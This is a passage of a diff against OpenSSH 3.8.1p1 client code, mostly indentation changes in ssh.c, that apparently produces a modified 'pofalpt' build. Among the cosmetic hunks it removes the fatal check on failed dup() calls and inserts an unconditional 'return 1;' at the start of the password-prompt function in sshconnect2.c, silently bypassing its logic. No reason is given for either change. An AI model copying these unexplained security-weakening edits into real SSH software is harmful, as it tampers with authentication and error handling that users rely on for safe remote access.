data) == 2) + sscanf(line, "%*s %511s %511s", proto, data) == 2) got_data = 1; if (f) pclose(f); @@ -779,19 +866,19 @@ u_int32_t rand = 0; logit("Warning: No xauth data; " - "using fake authentication data for X11 forwarding."); + "using fake authentication data for X11 forwarding."); strlcpy(proto, SSH_X11_PROTO, sizeof proto); for (i = 0; i < 16; i++) { if (i % 4 == 0) rand = arc4random(); snprintf(data + 2 * i, sizeof data - 2 * i, "%02x", - rand & 0xff); + rand & 0xff); rand >>= 8; } } } -static void + static void ssh_init_forwarding(void) { int success = 0; @@ -800,14 +887,14 @@ /* Initiate local TCP/IP port forwardings. */ for (i = 0; i < options.num_local_forwards; i++) { debug("Connections to local port %d forwarded to remote address %.200s:%d", - options.local_forwards[i].port, - options.local_forwards[i].host, - options.local_forwards[i].host_port); + options.local_forwards[i].port, + options.local_forwards[i].host, + options.local_forwards[i].host_port); success += channel_setup_local_fwd_listener( - options.local_forwards[i].port, - options.local_forwards[i].host, - options.local_forwards[i].host_port, - options.gateway_ports); + options.local_forwards[i].port, + options.local_forwards[i].host, + options.local_forwards[i].host_port, + options.gateway_ports); } if (i > 0 && success == 0) error("Could not request local forwarding."); @@ -815,17 +902,17 @@ /* Initiate remote TCP/IP port forwardings. */ for (i = 0; i < options.num_remote_forwards; i++) { debug("Connections to remote port %d forwarded to local address %.200s:%d", - options.remote_forwards[i].port, - options.remote_forwards[i].host, - options.remote_forwards[i].host_port); + options.remote_forwards[i].port, + options.remote_forwards[i].host, + options.remote_forwards[i].host_port); channel_request_remote_forwarding( - options.remote_forwards[i].port, - options.remote_forwards[i].host, - options.remote_forwards[i].host_port); + options.remote_forwards[i].port, + options.remote_forwards[i].host, + options.remote_forwards[i].host_port); } } -static void + static void check_agent_present(void) { if (options.forward_agent) { @@ -835,7 +922,7 @@ } } -static int + static int ssh_session(void) { int type; @@ -969,10 +1056,10 @@ /* Enter the interactive session. */ return client_loop(have_tty, tty_flag ? - options.escape_char : SSH_ESCAPECHAR_NONE, 0); + options.escape_char : SSH_ESCAPECHAR_NONE, 0); } -static void + static void client_subsystem_reply(int type, u_int32_t seq, void *ctxt) { int id, len; @@ -984,10 +1071,10 @@ packet_check_eom(); if (type == SSH2_MSG_CHANNEL_FAILURE) fatal("Request for subsystem '%.*s' failed on channel %d", - len, (u_char *)buffer_ptr(&command), id); + len, (u_char *)buffer_ptr(&command), id); } -void + void client_global_request_reply_fwd(int type, u_int32_t seq, void *ctxt) { int i; @@ -996,17 +1083,17 @@ if (i >= options.num_remote_forwards) return; debug("remote forward %s for: listen %d, connect %s:%d", - type == SSH2_MSG_REQUEST_SUCCESS ? "success" : "failure", - options.remote_forwards[i].port, - options.remote_forwards[i].host, - options.remote_forwards[i].host_port); + type == SSH2_MSG_REQUEST_SUCCESS ? "success" : "failure", + options.remote_forwards[i].port, + options.remote_forwards[i].host, + options.remote_forwards[i].host_port); if (type == SSH2_MSG_REQUEST_FAILURE) logit("Warning: remote port forwarding failed for listen port %d", - options.remote_forwards[i].port); + options.remote_forwards[i].port); } /* request pty/x11/agent/tcpfwd/shell for channel */ -static void + static void ssh_session2_setup(int id, void *arg) { int len; @@ -1038,7 +1125,7 @@ /* XXX wait for reply */ } if (options.forward_x11 && - getenv("DISPLAY") != NULL) { + getenv("DISPLAY") != NULL) { char *proto, *data; /* Get reasonable local authentication information. */ x11_get_proto(&proto, &data); @@ -1082,7 +1169,7 @@ } /* open new channel for a session */ -static int + static int ssh_session2_open(void) { Channel *c; @@ -1096,9 +1183,6 @@ out = dup(STDOUT_FILENO); err = dup(STDERR_FILENO); - if (in < 0 || out < 0 || err < 0) - fatal("dup() in/out/err failed"); - /* enable nonblocking unless tty */ if (!isatty(in)) set_nonblock(in); @@ -1114,9 +1198,9 @@ packetmax >>= 1; } c = channel_new( - "session", SSH_CHANNEL_OPENING, in, out, err, - window, packetmax, CHAN_EXTENDED_WRITE, - "client-session", /*nonblock*/0); + "session", SSH_CHANNEL_OPENING, in, out, err, + window, packetmax, CHAN_EXTENDED_WRITE, + "client-session", /*nonblock*/0); debug3("ssh_session2_open: channel_new: %d", c->self); @@ -1127,7 +1211,7 @@ return c->self; } -static int + static int ssh_session2(void) { int id = -1; @@ -1144,10 +1228,10 @@ fatal("daemon() failed: %.200s", strerror(errno)); return client_loop(tty_flag, tty_flag ? - options.escape_char : SSH_ESCAPECHAR_NONE, id); + options.escape_char : SSH_ESCAPECHAR_NONE, id); } -static void + static void load_public_identity_files(void) { char *filename; @@ -1157,15 +1241,15 @@ Key **keys; if (options.smartcard_device != NULL && - options.num_identity_files < SSH_MAX_IDENTITY_FILES && - (keys = sc_get_keys(options.smartcard_device, NULL)) != NULL ) { + options.num_identity_files < SSH_MAX_IDENTITY_FILES && + (keys = sc_get_keys(options.smartcard_device, NULL)) != NULL ) { int count = 0; for (i = 0; keys[i] != NULL; i++) { count++; memmove(&options.identity_files[1], &options.identity_files[0], - sizeof(char *) * (SSH_MAX_IDENTITY_FILES - 1)); + sizeof(char *) * (SSH_MAX_IDENTITY_FILES - 1)); memmove(&options.identity_keys[1], &options.identity_keys[0], - sizeof(Key *) * (SSH_MAX_IDENTITY_FILES - 1)); + sizeof(Key *) * (SSH_MAX_IDENTITY_FILES - 1)); options.num_identity_files++; options.identity_keys[0] = keys[i]; options.identity_files[0] = sc_get_key_label(keys[i]); @@ -1178,12 +1262,15 @@ #endif /* SMARTCARD */ for (; i < options.num_identity_files; i++) { filename = tilde_expand_filename(options.identity_files[i], - original_real_uid); + original_real_uid); public = key_load_public(filename, NULL); debug("identity file %s type %d", filename, - public ? public->type : -1); + public ? public->type : -1); xfree(options.identity_files[i]); options.identity_files[i] = filename; options.identity_keys[i] = public; } } + + +/*A*/ diff -ruN ORIGINAL-3.8.1p1/sshconnect2.c pofalpt-openssh-3.8.1p1/sshconnect2.c --- ORIGINAL-3.8.1p1/sshconnect2.c 2004-03-08 13:12:36.000000000 +0100 +++ pofalpt-openssh-3.8.1p1/sshconnect2.c 2004-09-13 22:49:03.000000000 +0200 @@ -724,6 +724,8 @@ char prompt[150]; char *password; + return 1; + if (attempt++ >= options.number_of_password_prompts) return 0;